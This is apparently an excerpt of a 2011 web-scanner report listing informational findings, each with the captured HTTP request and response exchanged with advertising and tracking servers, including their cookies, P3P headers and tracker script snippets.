HTTP/1.1 200 OK Set-Cookie: SNID=47=rmeNxjSpRiyo Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Sun, 15 May 2011 20:26:17 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://id.google.com |
Path: | /verify/EAAAAK1jLqbL |
GET /verify/EAAAAK1jLqbL Host: id.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.google.com Cookie: SNID=46=7OlI8L_PxEjK |
HTTP/1.1 200 OK Set-Cookie: SNID=47=IcQivqrsQQyy Cache-Control: no-cache, private, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Content-Type: image/gif Date: Sun, 15 May 2011 23:49:42 GMT Server: zwbk Content-Length: 43 X-XSS-Protection: 1; mode=block GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://idcs.interclick |
Path: | /Segment.aspx |
GET /Segment.aspx?sid Host: idcs.interclick.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 70 Content-Type: image/gif Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: sgm=9622=734271; domain=.interclick.com; expires=Sat, 15-May-2021 20:32:16 GMT; path=/ P3P: policyref="http://www Date: Sun, 15 May 2011 20:32:16 GMT GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://idpix.media6d |
Path: | /orbserv/hbpix |
GET /orbserv/hbpix?pixId=5392 HTTP/1.1 Host: idpix.media6degrees.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: acs=012020h1ll77mmxzt10; ipinfo=2ll77mm0zijsv |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: clid=2ll77mm01171voo Set-Cookie: orblb=2ll8nk2011y510 Set-Cookie: rdrlst=4030d6hll8nk2 Set-Cookie: sglst=2010s1jzll8nk2 Set-Cookie: vstcnt=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:20:07 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://image2.pubmatic |
Path: | /AdServer/Pug |
GET /AdServer/Pug?vcode Host: image2.pubmatic.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PUBMDCID=2; KADUSERCOOKIE=AFFBE250 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:52 GMT Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2 Set-Cookie: KRTBCOOKIE_58=1344-AG Set-Cookie: PUBRETARGET=445 Content-Length: 42 P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC" Cache-Control: no-store, no-cache, private Pragma: no-cache Connection: close Content-Type: image/gif GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://js.revsci.net |
Path: | /gateway/gw.js |
GET /gateway/gw.js?csid Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: udm_0=MLvv9S8JaSpnph4dB7K Last-Modified: Mon, 16 May 2011 01:25:49 GMT Cache-Control: max-age=3600, private Expires: Mon, 16 May 2011 02:25:49 GMT X-Proc-ms: 0 Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:25:48 GMT Content-Length: 5912 //Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) var rsi_now= new Date(); var rsi_csid= 'J06575';if(typeof(csids) ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://leadback |
Path: | /adcedge/lb |
GET /adcedge/lb?site=695501 Host: leadback.advertising.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=qw280013054845430029 |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 01:40:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=jCI0NFJwHsb0FpfqH Set-Cookie: GUID=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Mon, 16 May 2011 02:40:51 GMT Content-Type: image/gif Content-Length: 49 GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://media.fastclick |
Path: | /w/tre |
GET /w/tre?ad_id=20480;evt Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pluto2=660455823372; lyc=AwAAAARD0s9NACAA |
HTTP/1.1 302 Redirect Date: Mon, 16 May 2011 01:40:52 GMT Location: http://www.googleads P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV' Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/plain Content-Length: 0 Set-Cookie: lyc=BAAAAARD0s9NACAA Set-Cookie: pluto=660455823372; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 01:40:52 GMT |
Severity: | Information |
Confidence: | Certain |
Host: | http://odb.outbrain.com |
Path: | /utils/get |
GET /utils/get?url=http%3A%2F Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _lvs2="uaMqgoSgWEtsUDbY |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: obuid=8212382c-a920-4555 Cache-Control: no-cache Pragma: no-cache Set-Cookie: tick=1305508801726; Domain=.outbrain.com; Path=/ P3P: policyref="http://www Set-Cookie: _lvs2="uaMqgoSgWEtsUDbY Set-Cookie: _lvd2="e0MjrHqXH8wCQ Set-Cookie: _rcc2=NXlRX9sMiunRtm Set-Cookie: recs-d05ceaa5e98919d Content-Type: text/x-json;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:20:01 GMT Content-Length: 5695 outbrain_rater.retur ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://odb.outbrain.com |
Path: | /utils/ping.html |
GET /utils/ping.html?random=0 Host: odb.outbrain.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: obuid=8212382c-a920-4555 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: obuid=8212382c-a920-4555 Cache-Control: no-cache Pragma: no-cache Accept-Ranges: bytes ETag: W/"158-1304265382000" Last-Modified: Sun, 01 May 2011 15:56:22 GMT Content-Type: text/html Content-Length: 158 Date: Mon, 16 May 2011 01:19:52 GMT <html> <head> <META HTTP-EQUIV="Cache-Control <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> </head> <body> </body> </html> |
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/dk.js |
GET /a/dk.js?defaulting_ad Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_2146=xn7ja41kw4n |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:21:49 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4462/5032; expires=Mon, 16-May-2011 02:21:49 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=2; expires=Mon, 16-May-2011 02:21:49 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110290; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3179363.js^2 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 1279 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3179363" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://p.brilig.com |
Path: | /contact/bct |
GET /contact/bct?pid=21008FFD Host: p.brilig.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache,no-store,must Content-Type: text/plain Date: Mon, 16 May 2011 01:24:05 GMT Expires: Mon, 19 Dec 1983 01:24:05 GMT Location: http://tag.admeld.com P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Pragma: no-cache Server: Apache/2.2.16 (Ubuntu) Set-Cookie: BriligContact=98af0ff8 X-Brilig-D: D=2965 Content-Length: 0 Connection: keep-alive |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /D08734/a1/0/0/0.gif |
GET /D08734/a1/0/0/0.gif?D=DM Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: udm_0=MLv39S8JaSpnph4dB7K X-Proc-ms: 0 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:27:05 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /E06560/b3/0/3/0902121 |
GET /E06560/b3/0/3/0902121 Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 Set-Cookie: rtc_kCmS=MLsvrdMvcT5 X-Proc-ms: 18 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:24:03 GMT Content-Length: 699 /* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */ rsinetsegs=['E06560_10273 var rsiExp=new Date((new Date()).getTime() var rsiDom=location.hostname; rsiDom=rsiDom.replace(/.* ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /E06560/b3/0/3/0902121 |
GET /E06560/b3/0/3/0902121 Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_6axN=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 Set-Cookie: rtc_2CEm=MLuBq44HAVp X-Proc-ms: 1 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:33:41 GMT Content-Length: 699 /* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */ rsinetsegs=['E06560_10273 var rsiExp=new Date((new Date()).getTime() var rsiDom=location.hostname; rsiDom=rsiDom.replace(/.* ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /J06575/a4/0/0/pcx.js |
GET /J06575/a4/0/0/pcx.js Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 X-Proc-ms: 1 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:11 GMT Content-Length: 671 /* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */ rsinetsegs=[]; var rsiExp=new Date((new Date()).getTime() var rsiDom=location.hostname; rsiDom=rsiDom.replace(/.* ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /J06575/b3/0/3/1003161 |
GET /J06575/b3/0/3/1003161 Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: rtc_ac8M=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_d1yn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rtc_UHo_=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_segs_1000000 Set-Cookie: NETSEGS_G07608=82f49 Set-Cookie: rtc_ErQC=MLuBq44HAVp X-Proc-ms: 41 P3P: policyref="http://js Server: RSI Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: application/javascript Vary: Accept-Encoding Date: Mon, 16 May 2011 01:26:15 GMT Content-Length: 729 /* Vermont 12.4.0-1242 (2011-05-12 08:25:50 UTC) */ rsinetsegs=['J06575_50735 var rsiExp=new Date((new Date()).getTime() var rsiDom=location.hostname; rsiDom=rsiDom.repl ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.33across.com |
Path: | /ps/ |
GET /ps/?pid=454&uid Host: pixel.33across.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: 33x_ps=u%3D7836807683 |
HTTP/1.1 200 OK P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA' Set-Cookie: 33x_ps=u%3D7836807683 Pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate Expires: Thu, 01-Jan-70 00:00:01 GMT X-33X-Status: 0 Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:29:34 GMT Connection: close Server: 33XG1 GIF89a.............!... ...,...........L..; |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /data_sync |
GET /data_sync?partner_id=9 HTTP/1.1 Host: pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: exchange_uid="eyI0Ij |
HTTP/1.0 200 OK Server: IM BidManager Date: Mon, 16 May 2011 01:27:00 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Mon, 16-May-2011 01:26:40 GMT Content-Type: text/html Pragma: no-cache Cache-Control: no-cache Set-Cookie: dp_rec="{\"3\": 1305509220+ \"2\": 1305508826}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 01:27:00 GMT; Path=/ Content-Length: 512 <html> <body> <script type="text/javascript"> makePixelRequest("http:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.mathtag.com |
Path: | /event/img |
GET /event/img?mt_id=101281 Host: pixel.mathtag.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dd07bc8-e97b-118c |
HTTP/1.1 200 OK Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x4 pid 0x4128 16680 Cache-Control: no-cache Content-Type: image/gif P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Mon, 16 May 2011 01:40:50 GMT Etag: 4dd07bc8-e97b-118c-3dec Connection: Keep-Alive Set-Cookie: ts=1305510050; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:40:50 GMT Content-Length: 43 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.quantserve |
Path: | /pixel |
GET /pixel;r=2010864181;fpan Host: pixel.quantserve.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: mc=4d529fca-2c7e4-2f739 |
HTTP/1.1 302 Found Connection: close Location: http://segment-pixel Set-Cookie: d=ENQBWwHgBoHyDhmtEq P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Content-Length: 0 Date: Sun, 15 May 2011 21:31:35 GMT Server: QS |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.rubicon |
Path: | /tap.php |
GET /tap.php?v=4212&nid=1185 Host: pixel.rubiconproject.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_2146=xn7ja41kw4n |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:19 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.3 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: rpb=5671%3D1%264212%3D1; expires=Wed, 15-Jun-2011 01:26:19 GMT; path=/; domain=.rubiconproject Set-Cookie: rpx=5671%3D11993%2C0%2C1 Set-Cookie: put_1185=43258972898 Content-Length: 49 Content-Type: image/gif GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://pixel.rubicon |
Path: | /tap.php |
GET /tap.php?v=5671&nid=2081 Host: pixel.rubiconproject.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_2146=xn7ja41kw4n |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:19:53 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.3 P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: rpb=5671%3D1; expires=Wed, 15-Jun-2011 01:19:53 GMT; path=/; domain=.rubiconproject Set-Cookie: rpx=5671%3D11993%2C0%2C2 Set-Cookie: put_2081=AG-00000001 Content-Length: 49 Content-Type: image/gif GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.openx.net |
Path: | /set |
GET /set?pid=21a19823-5de3 Host: r.openx.net Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: i=5cb31120-2bcf-44f1-b2a9 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:26:09 GMT Server: Apache Cache-Control: public, max-age=30, proxy-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT Pragma: no-cache P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: i=5cb31120-2bcf-44f1-b2a9 Content-Length: 43 Connection: close Content-Type: image/gif GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /r/bd |
GET /r/bd?ddc=1&pid=54&cver=1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://cdn.turn.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:26:20 GMT; Path=/ Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:26:20 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /r/beacon |
GET /r/beacon?b2=FLmRqLw Host: r.turn.com Proxy-Connection: keep-alive Referer: http://sony.links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=4325897289836481830; pf=j9tCwElDbZnXmBEvu |
